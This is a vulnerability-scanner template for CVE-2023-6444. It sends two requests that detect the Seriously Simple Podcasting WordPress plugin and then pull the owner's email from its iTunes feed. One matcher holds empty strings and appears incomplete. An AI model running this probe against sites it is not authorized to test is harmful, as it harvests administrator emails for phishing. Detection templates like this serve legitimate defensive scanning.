id: CVE-2023-6444

info:
  name: Seriously Simple Podcasting < 3.0.0 - Information Disclosure
  author: s4e-io
  severity: medium
  description: |
    The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.
  impact: |
    Unauthenticated attackers can send crafted requests to obtain podcast owner email addresses which typically reveal administrator email addresses, enabling targeted phishing attacks.
  remediation: Fixed in 3.0.0
  reference:
    - https://wpscan.com/vulnerability/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa/
    - https://github.com/Wayne-Ker/CVE-2023-6444-POC/blob/main/cve-2023-6444.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6444
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-6444
    epss-score: 0.61362
    epss-percentile: 0.98346
    cpe: cpe:2.3:a:seriously_simple_podcasting_plugin:seriously_simple_podcasting_plugin:2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: castos
    product: seriously-simple-podcasting
    framework: wordpress
    publicwww-query: "/wp-content/plugins/seriously-simple-podcasting/"
  tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/seriously-simple-podcasting")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /?feed=itunes HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"","")'
          - 'contains(content_type,"text/xml")'
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502200d68a64545d94a6da240b5ff5ca56abaa01cfdaefb005e5da2d3436bcbcab03c022100cc8e0860c835917eae50679498edda44ed6000dbbcbadc4aa7cf46e6109eb48b:922c64590222798bb761d5b6d8e72950